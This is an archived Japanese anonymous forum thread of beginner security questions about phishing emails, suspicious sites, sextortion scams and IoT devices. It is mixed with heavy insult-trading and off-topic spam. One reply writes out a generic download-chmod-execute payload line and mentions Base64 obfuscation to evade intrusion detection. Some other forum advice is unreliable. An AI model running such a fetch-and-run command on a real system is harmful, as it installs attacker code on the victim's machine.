セキュリティ初心者質問スレッド Part141
■ このスレッドは過去ログ倉庫に格納されています
初心者の方の為のインターネットとパソコンのセキュリティについてのスレッドです
自習を出来るリンクも紹介していますので自衛のご参考にして下さい
━ *質問マナー ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ アドバイスをもらう為に、「質問用テンプレート」を使って質問しましょう
・ 2回目以降の発言書込は、名前欄に「最初に質問した番号」を半角英数字で入力して下さい
・ アドバイスする方は、解りやすい説明をしてあげて下さい
・ 他から誘導されて来た場合は、その旨書いておきましょう
・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)
・ ここにサイトURLを示す場合、先頭のhを抜いてリンクして下さい
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】 『』 例、Windows 7 Home Premium 64-bit 、XP Home SP3
【PCスペック】 『CPUの種類: GHz 、メモリ: MB』 (「システムのプロパティ」で確認)
【使用ブラウザ】 『』 例、Internet Explorer 8
【セキュリティソフトと年式】 『』 例、○○○○ 2011
【その他スパイウェア対策ソフト】 『』
【具体的な症状】 『』
【過程と措置】 『』
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Windows オペレーティング システムが32 ビット版か 64 ビット版かを確認する方法 (XP proやVistaやWindows 7の方)
ttp://support.microsoft.com/kb/827218/ja
*画像アップロードサイト ttp://uploadgeek.com/
(アップロード後 → サムネイル表示をクリックしてオリジナルサイズ画像のプロパティURLを)
*長い文面の中継サイト ttp://www.text-upload.com/upload.php
前スレ セキュリティ初心者質問スレッド Part140
https://medaka.5ch.net/test/read.cgi/sec/1547634719/ 通信内容までいちいち調べなくても怪しい通信先に通信してないか見ればわかるよね
ほんと何にもしらない素人ですね >>593
ホンマもんのアホはお前だろ
ウイルスの除去の確認だから不正な通信を解析する必要は無い >>593
最新記事なんて読まないもんなw
ですからおじさんはpixivがソースっすもんねwww >>593
このアホ、セキュリティスペシャリストにはまったく歯が立たず完敗(笑)
負け犬wwwww >セキュリティスペシャリスト
そんなやつがここに居ると思っているのかよw
ほんまもんのアホやな 企業サーバーのセキュリティ管理者している人は手を上げて!
その中でまともに感染時の対応処置が出来ていると胸を張って言える人はいるのかよ?
感染しているプロセスファイルを放ったままにしていてどこぞの電気機器メーカーのようになっちまっている人はいないか?w バカの一本釣りwww
大間のマグロのように高値は付かない 出来なきゃそもそも仕事にならんだろ
マジでバカだな >>598
おいおい自分が引きこもりだからって他人もそうに違いないって思考はやめようよ・・・ おいおい 自分が皮被りだからって他人もそうだと思うなよw Windows7のサポートは、1月14日に終了しました
本スレでは、下記の範囲でサポートしています
1 アップグレードの権利を有する人のWindows10への合法アップグレード手助け
(1月14日以降は、原則としてアップグレードの権利を失います)
今後は、以下ケースバイケースでのサポートとなります
2 これまでリリースされたWindows7のサービスパック、修正プログラムのMicrosoftリンク情報
3 Windows7を引き続きサポートする各ハードウェア、ソフトウェアの情報
特別な契約をした法人ユーザーに対しては、
今後もWindows7向けのセキュリティ更新プラグラムは有償提供されるようですが、
一般の個人に対しては提供されません
また、XPの時に見られたEmbeddedOSのパッチ流用など不正の相談はしません
絶対にやらないでください
本スレでは、正規の権利を持っていない人は
すみやかにWindows10PCに買い換えることを強くオススメいたします! >>602
どっからでてきた引きこもり
(一粒で二度おいしい) 引きこもり言われたのが相当くやしかったらしいな・・・ (´・ω・`) マックならウイルス対策必要ないですよ
そのままインターネット直結でOKです >>608
必要だぞ
ハッカーは結構apple id狙ってるし
脆弱性もwindowsより見付かってた時があったからな
無いより有る方が良い アヴァストセキュアラインのIP丸見えですよみたいな警告が出るんですが
有料セキュリティ入れてるのにまださらに対策しないとダメなんですか? VPNはフリーWIFIに接続する時くらいしか必要ないからどっちでもいい
無料のVPNなんざいくらでもあるし この掲示板に来ている人へ
独島(日本名:竹島)は韓国領、ということで動いてくれ
すべての日本人たちに教えてやってくれ 독도는 일본땅 金だ!と思って
掴まされたのは、子供銀行券だった
額面も
「十円、二十円」
ではなく、
「十団、二十団」
であった 【悲報】 TikTok、キーロガーだった [787645228]
iOS 14でバッチリ可視化、TikTokが「他アプリで入力中のテキスト」を逐一読み取る様子 2020年6月26日
ビデオアプリ「TikTok」が、他のアプリで入力中のテキストを
ほぼリアルタイムで逐一読み取っている様子を可視化したムービーが、海外で大きな波紋を呼んでいる。
https://internet.watch.impress.co.jp/docs/yajiuma/1261591.html
https://leia.5ch.net/test/read.cgi/poverty/1593149876 >>579
> 速攻でクレカを停止してもらいなんとか59万円以下に被害は止められました
怖すぎやろwww 【使用OS】Windows10
【使用ブラウザ】Firefox77.0
【セキュリティソフトと年式】Windows Defender
【その他スパイウェア対策ソフト】特になし
ゲームの情報を探そうとgoogleから
http://comas78be.dip.jp/%E5%A4%AA%E9%96%A4-%E7%AB%8B%E5%BF%97%E4%BC%9D-5-%E5%9F%8E%E4%B8%BB-%E6%8C%87%E7%A4%BA.html/
に飛びました
botじゃないならボタンをクリックみたいなのをクリックすると、欲しい情報ではなく広告?ばかり並んでいるページが表示され
中に下載の文字があったので?中華系?もうやめておこうとタブを閉じましたが、後から不安になってきました
アドオンNoscriptで基本Javascriptは切ってる状態でブラウジングしてます
今回もそうですが、メジャーでないサイトを見る際はSecURLやVirusTotal-URLやaguse.jpなどでチェックしたりしていて
botチェック前のページはSafe判定ですが、ボタンを押した後までは判定してくれないので未チェックなわけだと後から気付きまして・・・
過去レスを読むとサイトを表示させただけで危ないではなく、そこから情報を入力したり、何かをインストールしたりすると危険と思ったのですが
今回のようにフォームボタンを押すというのはどれくらいリスクがあるのでしょうか?
何かをインストールしろとウインドウ等が出たわけではなく広告がずらっと並んだページが表示されただけです JavaScriptが動作せずHTML部分だけであれば、イメージレンダラとかに脆弱性が
なければ問題が発生することはないはずだけど >>623
最新のブラウザならzero day使わないと感染させられないから問題はない
zero dayでもすぐに対策されないようにもっと普通のサイトのように偽装してステルス性の高い方法を使う
広告が大量に出るなら広告収入目的のサイトだろうし
そんなサイトにウイルス仕掛けてたら広告から紐付けされてすぐ捕まるからやらないだろうな
有り得るとするなら広告配信しているサイトがハッキングされた場合くらい >>624-625
いざ表示してみると検索結果の要約文がさっぱり表示されずに
広告ばかりのサイトがありますが、広告収入目的ってパターンもあるのですね
勉強になります
ありがとうございました 小説を書いている者ですが
質問にどなたか答えて頂けると有り難いです。
遠隔操作でpc内の情報を全てそのまま抜き取る事が可能ですか?
方法は警察が行っている通信傍受の技術を利用してと言う設定ですが可能ですか? >>627
遠隔操作ならファイル操作も可能だけど通信傍受だけじゃ無理だな
その場合はネットワークに流れているパケットを傍受するだけだからPC内のデータにはアクセス出来ない
通信傍受ってただの盗聴な訳で拾えて使えるデータはログインのためのIDやパスワードくらい
それも今じゃ暗号化されていて平文で流れてることは滅多にない
まあ、違和感無く書くのなら傍受した暗号を量子コンピュータで複合化してアカウントとパスワードを手に入れてアクセスしたって所が現実的
他ならスーパーコンピューターに搭載されたAIに寄る予測演算とか
暗号処理に乱数の偏りがあって実は弱いパスワードになってるとか
IoT機器が古いバージョンのファームウェアで脆弱性を突くとかかな
PC内のデータを抜く場合はウイルスを送り込んで抜く方法
もしくはファイル共有などの元々ファイル操作が可能なソフトの脆弱性を利用して外部に公開出来るようにする方法くらいかな?
普通そういうファイル操作出来るソフトは標準じゃ外部ポートを開いてないんだが
現実的ならRDPかSSHくらいだと思う
一般家庭の場合クライアントモードで動作しているから一般のPCに入るのは難しい
サーバーと通信中の3way handshakeとかに介入するとかそういう感じなら小説でも誤魔化せると思う
基本的にハッキングって言うのはエクスプロイトとペイロードに別れてて
エクスプロイトは脆弱性その物のことでペイロードはハッキングしたPCへ送るコマンドになってる
ペイロードの部分は色々とあるけど
"wget ウイルスのあるURL;chmod 777 ダウンロードしたウイルス;sh ダウンロードしたウイルス"
みたいなコマンドが書かれていたりする
そしてIDSやIPSって言われる通信監視ソフトなんかのセキュリティソフトが動いてる訳だけど
そういうのはBase64などでエクスプロイトとペイロードを難読化させて監視を回避することが多い 答えて下さり有り難うございます。
参考にさせて頂きます。 そういえば先日キーロガーに関する記事を見たな。
投稿しかけた下書き文章も盗み見られてしまっているかもしれない 小説をネットに投稿するならさ、
できれば
独りよがりな世界観でファンタジーものにするのだけはやめてくれ
ネットの小説ってそんなのばっかりだから
読み手のことを全然考えてないヤツが多すぎる 情報セキュリティ産業って縮小すると思いませんか
ブラウザもOSもセキュアになってるじゃないですか クラウドなら安心って思ってる人いるけど
ちゃんと対応してないと危ないんだよ placon@placon-construcao.com.br @は大文字
てところから、脅迫詐欺メール来たわ
長文なんで要約するとハッキングして個人情報全部抜き取りました。
みんなにバラされたくなかったらビットコインを振り込めってさ
「 私はあなたが楽しんでいる関連サイトのスクリーンショットを撮りました(それが何であるかを理解してくださいね)。
その後、私たちはオナニーのスクリーンショットを作成し(デバイスのカメラを使用)、一緒に撮影しました。
驚いた!とても素晴らしいです!」
俺のオナニーは素晴らしいのかw 最近はamazonやら楽天騙った詐欺メールも多いからな クラウドを盲信してるとしっぺ返しを食らうど
なんてなー BOXあたりだと結構しっかりしているかも
仕事用にセキュアキー貰った
無くすと2万円近く弁償すると聞いて困っている amazonの糞偽メールガンガン来る
これお前買ったよな?
もし違うならキャンセルしろや、とか
アカウント停止したわ、
何かの間違いならこのリンクから解除しろやみたいなの
秒で馬鹿丸出しで偽物って分かるんだけど
リテラシーない嫁に話したら、
全然分からないって言ってた >>637
>大文字
このスレ、ほんとバカばっかだな 大文字指摘ごときでマウント取りたがる馬鹿とか、そんなんばっかだよな 横だが
専門知識で揚げ足取るなら分かるけど
大文字がどうこうと知識も何もない揚げ足取りは無能を証明してるだけ 637だけど、643は俺じゃない
気を使ったつもりだけど(そもそもスパムに不要か)
@を大文字にしただけで酷い言われようだな
サポくれた人サンクス 【使用OS】 Windows 10 Home 1909
【PCスペック】 corei5
【使用ブラウザ】 firefox 78.0.1 (64 ビット)
【セキュリティソフトと年式】 ノートン360
【具体的な症状】
あなたのアカウント情報を更新できませんでした。
というAmazonを騙る迷惑メールにひっかかり、
”所有権の証明”というボタンを押してしまいました。
すると
”何かをする前には、まず後の事を考えないといけない”
という”狐と山羊”という寓話が表示されたのですが、
念のため現在、ノートンでシステムを完全スキャンしています。
後は、寓話どおりに、うかつにボタンを押さないように反省する
だけでよいでしょうか?
他にすべきことはありますか? システム全部を「正常な状態」に戻すべき
バックアップしてないの? だったら工場出荷時にリセットだ >>651
回答をありがとうございます。
しかしソースを見ると、”所有権の証明”というボタンは
HTPPS://japan.〜〜cloud/dashboard/inspect.php?mil=xxx@yyy.zz.jp
のように、xxx@yyy.zz.jp(仮)という自分の
メールアドレスが渡されているのみなので
システムがどうのというのはないと
思います。
しかしなぜ
”狐と山羊”という寓話が >>650
スパム送るための生存確認じゃないんかな?
ウイルス仕掛けるならそんなメールアドレスをパラメータにして送ることも必要無いし
フィッシングサイトならIPやメール表示して特定したって脅しかけてくるサイトもあるけど >>653
大文字のほうが低能馬鹿ですからwwwwwwwwwwwwwww >>654
回答をありがとうございます。
一時減っていた迷惑メールがまたまた増えてます。
生存確認され、ますます増えますね。
ノートンがスパムメールの検査をしないPOPポートを
使っているので、スパムタグもつかず、ちょうど
Windowsをアップデートして、最初にログインした
タイミングでメールが来たので、つい本物と思い、
”所有権の証明”ボタンを押してしまいました。
失敗しました。 昔に何かで貰った光boxとかいう糞みたいな端末を
セキュリティソフトもインスコせずに動画専門端末にしたいんですが
これって同じルーター使ってる別の端末にもマルウェア感染したりしますかね その糞みたいな端末を使えるように
今までずっと金払ってたのか? >>659
サポート終わってるなら感染する可能性はある >>662
@は大文字、大文字!?
この低脳がwwwww 揚げ足しか取れない荒らしは無視でいいよ
何も知らないんでしょ @は大文字なんて言っちゃう低能も無視な
こいつは間違いなくなーんにもしらないwwwwwwwwwwwwwwww 半角文字スレでXvideosのURLリンクに国別コードトップレベルドメイン?(de, fr)を貼り付ける人がいるのですが、
何かセキュリティ的な悪意はあるでしょうか xvideosはサブドメインで言語識別してるんじゃなかったかな?
日本語だとjp.xvideos.com的な感じだった気がする >>665
お前が一番の雑魚だってみんな笑ってるよw >>669
あ、そういうのです。サブドメインと言うのですか。失礼しました
いたずら程度なら良いのですが >>670
バカの大文字君が何か言ってるよwwwwwwww >>673
@は大文字
これ以上のバカはありませんからwwwwww >>674
大文字しか言えない底辺馬鹿
で、お前真面目にセキュリティ知ってんの? >>675
@は大文字
これ以上のバカはありませんからwwwwww
バカなんだよな?wwww >>676
で、お前真面目にセキュリティ知ってんの?www
こいつ、ただのド素人だなw このスレ「放屁」という言葉をよく見かける。
「放屁」にも色々あると思うのだけど、詳しいスペックを書いてる放屁はほとんど無い。
日常で、様々な理由で排出される健康体の放屁
嘔吐できるだけの悪臭がある放屁
エレベーターの中や車中等の密室空間で排出される無慈悲な放屁
運動中や健康診断受診時等の公に放出できる放屁と
その気は無いのに無意識に放出される突発性放屁(いわゆるぷうううううううううううううううううううううううううううううううううううううううううううううううううううううううううううううううううううううう)
ではその内容が全然違うように思うのだが… >>677
あらあら、大文字君が逸らし始めましたよwwww
ミエミエでさらに笑えるwwwwwwwww
だから@は大文字、なんてバカなんですわw >>661
ルーターを介して別の端末に感染させるんですか?
そんなマルウェアがあるんですね >>679
うん、大文字ってのは間違いだねw
でもそんなこと本人含めて当たり前に分かってるんだよ
んで、いつまでも揚げ足とって粘着してるド素人がお前
で、お前セキュリティなんか知ってんの?w
オンプレでセキュリティ対応、何やったことある?
ん?w >>680
基本的にIoTに感染させてbot化させるだけが多いけど
他に狙えそうなのがあればbot化したIoT経由して攻撃仕掛けてくることはある
ルーターやインターネットTV専用機器などのIoTは金銭やプライバシーの情報が少ないからVPNやDDOS目的のbotが多い
まあ、回線を物理的に分けるとかVLANとかセグメント化するとかLAN内感染を防ぐ方法もあると言えばある >>681
あれれ本人が分かってるはずなのなら、@は大文字(笑)なんて書き込んだのかな?
バカだからだよねえwwww
必死でそらそうとしてるのも笑えるwww >>637
いい加減こいつが誤りを認めればいいのに、揚げ足取りなんて誤魔化すもんだから
この人ほんと頭が悪く見えます >>684
本人もヤレヤレ・・ってレスしてただろってだけなのに
何顔真っ赤なの?w
で、頭湧いてるお前はセキュリティの何知ってんの?ん?
ド素人の馬鹿が大文字だけ揚げ足取れて
ウッキウキなのみんなに笑われて良かったねwwww >>688
大文字野郎が顔真っ赤(笑)
@は大文字wwwwww >>690
このことについて他に話題を逸らす必要がないからね
ばーかw >>691
本人含めて、全員間違いって言ってんのに
お前1匹がいつまでも粘着してるわけだが
で、お前セキュリティの何知ってんの?ん?w >>692
こんなドバカなことした私は最低のバカですって認めるわけねw
ほんとこのスレの程度低いわwww ■ このスレッドは過去ログ倉庫に格納されています